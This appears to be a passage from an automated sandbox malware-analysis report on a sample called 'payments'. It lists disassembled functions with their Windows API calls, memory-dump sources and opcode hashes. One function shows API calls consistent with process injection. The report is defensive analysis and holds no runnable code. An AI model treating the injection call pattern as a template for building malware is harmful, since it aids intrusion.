                                                                                                                          • String ID: aut
                                                                                                                          • API String ID: 3285503233-3010740371
                                                                                                                          • Opcode ID: 21028ca4d0569318af763b78c17b206cb1a4a84651ddf6748924b8392dfec400
                                                                                                                          • Instruction ID: 1fba2d8b7b2fa41aec1905eef068260e657288b789f5966d05b174c7de40869f
                                                                                                                          • Opcode Fuzzy Hash: 21028ca4d0569318af763b78c17b206cb1a4a84651ddf6748924b8392dfec400
                                                                                                                          • Instruction Fuzzy Hash: 45D05E7550030EBBDB10AB90DC0EFCA776C9708704F0041A07660E91B1DBB4E69A8B68
                                                                                                                          Function 00CEF8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 23c17fff19018fd1ee5c60cec52f9992786c8891ce425bb146247f580093769f
                                                                                                                          • Instruction ID: 0c398b1a3e6b9815fc51ed65595313ee9b261f4b3a2a9b64bd62d1bbfbf80ee3
                                                                                                                          • Opcode Fuzzy Hash: 23c17fff19018fd1ee5c60cec52f9992786c8891ce425bb146247f580093769f
                                                                                                                          • Instruction Fuzzy Hash: 27F16C716083419FCB10DF29C885B5ABBE5FF88314F14892EF9959B392D774E906CB82
                                                                                                                          Function 00C94FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 00C95022
                                                                                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C950CB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: IconNotifyShell__memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 928536360-0
                                                                                                                          • Opcode ID: 11f404d21ab6f60251761f1d78526ed789013ca308238860c98c47c2d90117cb
                                                                                                                          • Instruction ID: 829e76bb211bfb851222a5819b959a3c224ef7fe1b45a23d486f785a551c8514
                                                                                                                          • Opcode Fuzzy Hash: 11f404d21ab6f60251761f1d78526ed789013ca308238860c98c47c2d90117cb
                                                                                                                          • Instruction Fuzzy Hash: 203150B5504701DFD721DF25D84979BBBE8FF48309F00092EE99AC6391E771AA44CBA2
                                                                                                                          Function 00CB395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __FF_MSGBANNER.LIBCMT ref: 00CB3973
                                                                                                                            • Part of subcall function 00CB81C2: __NMSG_WRITE.LIBCMT ref: 00CB81E9
                                                                                                                            • Part of subcall function 00CB81C2: __NMSG_WRITE.LIBCMT ref: 00CB81F3
                                                                                                                          • __NMSG_WRITE.LIBCMT ref: 00CB397A
                                                                                                                            • Part of subcall function 00CB821F: GetModuleFileNameW.KERNEL32(00000000,00D50312,00000104,00000000,00000001,00000000), ref: 00CB82B1
                                                                                                                            • Part of subcall function 00CB821F: ___crtMessageBoxW.LIBCMT ref: 00CB835F
                                                                                                                            • Part of subcall function 00CB1145: ___crtCorExitProcess.LIBCMT ref: 00CB114B
                                                                                                                            • Part of subcall function 00CB1145: ExitProcess.KERNEL32 ref: 00CB1154
                                                                                                                            • Part of subcall function 00CB7C0E: __getptd_noexit.LIBCMT ref: 00CB7C0E
                                                                                                                          • RtlAllocateHeap.NTDLL(00E70000,00000000,00000001,00000001,00000000,?,?,00CAF507,?,0000000E), ref: 00CB399F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1372826849-0
                                                                                                                          • Opcode ID: 965d1c5d1a176965e659e61ddffd8d2f837a7cb8add712eced79b191d3c9eeb6
                                                                                                                          • Instruction ID: eeef9e07bb8b6693c0e90884626b1d09371403caf3a0b46443d6b999a3516172
                                                                                                                          • Opcode Fuzzy Hash: 965d1c5d1a176965e659e61ddffd8d2f837a7cb8add712eced79b191d3c9eeb6
                                                                                                                          • Instruction Fuzzy Hash: 6601F531785351AAE6223B29EC56AEE374C9BC1761F640129FD11DB282DFB09E009AA0
                                                                                                                          Function 00CDC6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00CDC385,?,?,?,?,?,00000004), ref: 00CDC6F2
                                                                                                                          • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00CDC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00CDC708
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00CDC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00CDC70F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseCreateHandleTime
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3397143404-0
                                                                                                                          • Opcode ID: e49546627062e40e38bbf636b0f68f7499f0e9493b0c906eb71cc426c9185b0c
                                                                                                                          • Instruction ID: b98c06d68b21610bf23ae03111de4140831dbaadc4b386c7746f941372d0506a
                                                                                                                          • Opcode Fuzzy Hash: e49546627062e40e38bbf636b0f68f7499f0e9493b0c906eb71cc426c9185b0c
                                                                                                                          • Instruction Fuzzy Hash: ABE08632180314BBD7211B54AC09FCA7B19AB05760F108111FB24A91E0DBB1265287A8
                                                                                                                          Function 00CDBB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _free.LIBCMT ref: 00CDBB72
                                                                                                                            • Part of subcall function 00CB1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00CB7A85), ref: 00CB1CB1
                                                                                                                            • Part of subcall function 00CB1C9D: GetLastError.KERNEL32(00000000,?,00CB7A85), ref: 00CB1CC3
                                                                                                                          • _free.LIBCMT ref: 00CDBB83
                                                                                                                          • _free.LIBCMT ref: 00CDBB95
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 776569668-0
                                                                                                                          • Opcode ID: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                                                                                          • Instruction ID: 5115ecf3dc1c8b1b7b9ece648a89d95c9531fdee2675c8a1d8dc0c6d31128897
                                                                                                                          • Opcode Fuzzy Hash: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                                                                                          • Instruction Fuzzy Hash: 3FE0C2A120070093CA2065386E44EF317CC0F04391B08080FB92AE3242CF20EC4098A4
                                                                                                                          Function 00CF0828 Relevance: 3.2, APIs: 2, Instructions: 232COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _strcat.LIBCMT ref: 00CF08FD
                                                                                                                            • Part of subcall function 00C9936C: __swprintf.LIBCMT ref: 00C993AB
                                                                                                                            • Part of subcall function 00C9936C: __itow.LIBCMT ref: 00C993DF
                                                                                                                          • _wcscpy.LIBCMT ref: 00CF098C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __itow__swprintf_strcat_wcscpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1012013722-0
                                                                                                                          • Opcode ID: 80c4f9e9e25515716c4884b7276b90a5c4e9d45fcb6463e6a75b9d7d75c227d2
                                                                                                                          • Instruction ID: 414208a472323b8e71ec9e7a79f7435ba507cf44c2a7b94fac64f4aedc522d90
                                                                                                                          • Opcode Fuzzy Hash: 80c4f9e9e25515716c4884b7276b90a5c4e9d45fcb6463e6a75b9d7d75c227d2
                                                                                                                          • Instruction Fuzzy Hash: 18915B34A00605DFCB58DF28C4959A9B7E5FF49710B61806EE91A8F3A2DB31ED41DB81
                                                                                                                          Function 00CBE9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ___lock_fhandle.LIBCMT ref: 00CBEA29
                                                                                                                          • __close_nolock.LIBCMT ref: 00CBEA42
                                                                                                                            • Part of subcall function 00CB7BDA: __getptd_noexit.LIBCMT ref: 00CB7BDA
                                                                                                                            • Part of subcall function 00CB7C0E: __getptd_noexit.LIBCMT ref: 00CB7C0E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1046115767-0
                                                                                                                          • Opcode ID: ca784072a1f7f5eaa78cf92f44d6074397ffbe276fe779ea258f6685489e2422
                                                                                                                          • Instruction ID: 4e816f61048ebe983914eb9db7f177495d894ca317fd5d387342975a1c6affd7
                                                                                                                          • Opcode Fuzzy Hash: ca784072a1f7f5eaa78cf92f44d6074397ffbe276fe779ea258f6685489e2422
                                                                                                                          • Instruction Fuzzy Hash: 7011A9729057108FD711BF64C8413D87E656F81B32F264344E8745F1E2C7B89D41BBA5
                                                                                                                          Function 00CAF4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CB395C: __FF_MSGBANNER.LIBCMT ref: 00CB3973
                                                                                                                            • Part of subcall function 00CB395C: __NMSG_WRITE.LIBCMT ref: 00CB397A
                                                                                                                            • Part of subcall function 00CB395C: RtlAllocateHeap.NTDLL(00E70000,00000000,00000001,00000001,00000000,?,?,00CAF507,?,0000000E), ref: 00CB399F
                                                                                                                          • std::exception::exception.LIBCMT ref: 00CAF51E
                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00CAF533
                                                                                                                            • Part of subcall function 00CB6805: RaiseException.KERNEL32(?,?,0000000E,00D46A30,?,?,?,00CAF538,0000000E,00D46A30,?,00000001), ref: 00CB6856
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3902256705-0
                                                                                                                          • Opcode ID: 82bbc46419c36398c8fd2302a08e4a3f598b30583c362d2489df9cf3f4c38a89
                                                                                                                          • Instruction ID: 72b81ca4a4830e9136c44f84cc87bd12791ff0c3be204210b67ae4d9b5f16dc1
                                                                                                                          • Opcode Fuzzy Hash: 82bbc46419c36398c8fd2302a08e4a3f598b30583c362d2489df9cf3f4c38a89
                                                                                                                          • Instruction Fuzzy Hash: 05F0FF3140021EA7DB01FFD8E8029DEB7ACAF02358F604029F909A2181CFB0DB81A7B5
                                                                                                                          Function 00CB35E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CB7C0E: __getptd_noexit.LIBCMT ref: 00CB7C0E
                                                                                                                          • __lock_file.LIBCMT ref: 00CB3629
                                                                                                                            • Part of subcall function 00CB4E1C: __lock.LIBCMT ref: 00CB4E3F
                                                                                                                          • __fclose_nolock.LIBCMT ref: 00CB3634
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2800547568-0
                                                                                                                          • Opcode ID: 4ea5487556a316f1bebe1d12d05e45ec4ea42009eca946774634557a8dd7c2a7
                                                                                                                          • Instruction ID: 6d8ef69a026156f1bd4365f979beac12341c5ef5f801db861147f0df98296097
                                                                                                                          • Opcode Fuzzy Hash: 4ea5487556a316f1bebe1d12d05e45ec4ea42009eca946774634557a8dd7c2a7
                                                                                                                          • Instruction Fuzzy Hash: 4EF0BB31881A44AAD7117B65C8067DE7BA07F41734F258108F421AB2C1C77CDB01BB55
                                                                                                                          Function 010ABFDD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 010AC79B
                                                                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 010AC831
                                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 010AC853
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1359173157.00000000010AA000.00000040.00000020.00020000.00000000.sdmp, Offset: 010AA000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_10aa000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2438371351-0
                                                                                                                          • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                                                          • Instruction ID: 5313fb45d6ef73604cdddfeeef18cb11648b53f949c7de140507d4ec689e4250
                                                                                                                          • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                                                          • Instruction Fuzzy Hash: D112DD20E24658C6EB24DF64D8507DEB272EF68300F1090E9910DEB7A5E77A4E81CB5A
                                                                                                                          Function 00CB2957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __flush.LIBCMT ref: 00CB2A0B
                                                                                                                            • Part of subcall function 00CB7C0E: __getptd_noexit.LIBCMT ref: 00CB7C0E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __flush__getptd_noexit
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4101623367-0
                                                                                                                          • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                                                          • Instruction ID: f941b59f7d999453c34fe8033b4ca8a604e28f92ff22ee78010fb9618f0d7771
                                                                                                                          • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                                                          • Instruction Fuzzy Hash: 9E419771B007069FDF288EA9C8915EE7BA6EF45361F24863DE869CB244D770DE41AB40
                                                                                                                          Function 00CAED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 544645111-0
                                                                                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                          • Instruction ID: 30bd52aea288e45cf569003362f0c12ff58bd01f9b9e6c14e6a9b51452db0235
                                                                                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                          • Instruction Fuzzy Hash: D731C774A00106DBD718DF59C480969FBB6FF8A348B6486A9E419CB256DB31EEC1CBD0
                                                                                                                          Function 00CF040F Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 269201875-0
                                                                                                                          • Opcode ID: 48052f822807b2d23ae8f828d4d35c74342fb52e01ada7d724d91ce89d96af4d
                                                                                                                          • Instruction ID: c7ae766c3436208516e3e393283fd98dab5e3c991d0be4e8b4b0bf84f416c902
                                                                                                                          • Opcode Fuzzy Hash: 48052f822807b2d23ae8f828d4d35c74342fb52e01ada7d724d91ce89d96af4d
                                                                                                                          • Instruction Fuzzy Hash: 7B31C035204528DFCF01AF05C49067EBBB0FF49724F21844AEA951B387EBB0A905DF86
                                                                                                                          Function 00D09A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClearVariant
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1473721057-0
                                                                                                                          • Opcode ID: 383e6402487ec1f760728f2505824c7ab8c78ccafe3b6106da94ef202650e9aa
                                                                                                                          • Instruction ID: 0a0ee5f3aa24eed6f377f9916cb71ad6f1da7cc24131b46571739422b3a00d1f
                                                                                                                          • Opcode Fuzzy Hash: 383e6402487ec1f760728f2505824c7ab8c78ccafe3b6106da94ef202650e9aa
                                                                                                                          • Instruction Fuzzy Hash: 8C415F70904612CFDB24CF59C484B1ABBE1BF45358F29895CE99A4B362C372F846DF52
                                                                                                                          Function 00C941A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C94214: FreeLibrary.KERNEL32(00000000,?), ref: 00C94247
                                                                                                                          • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00C939FE,?,00000001), ref: 00C941DB
                                                                                                                            • Part of subcall function 00C94291: FreeLibrary.KERNEL32(00000000), ref: 00C942C4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Library$Free$Load
                                                                                                                          • String ID:
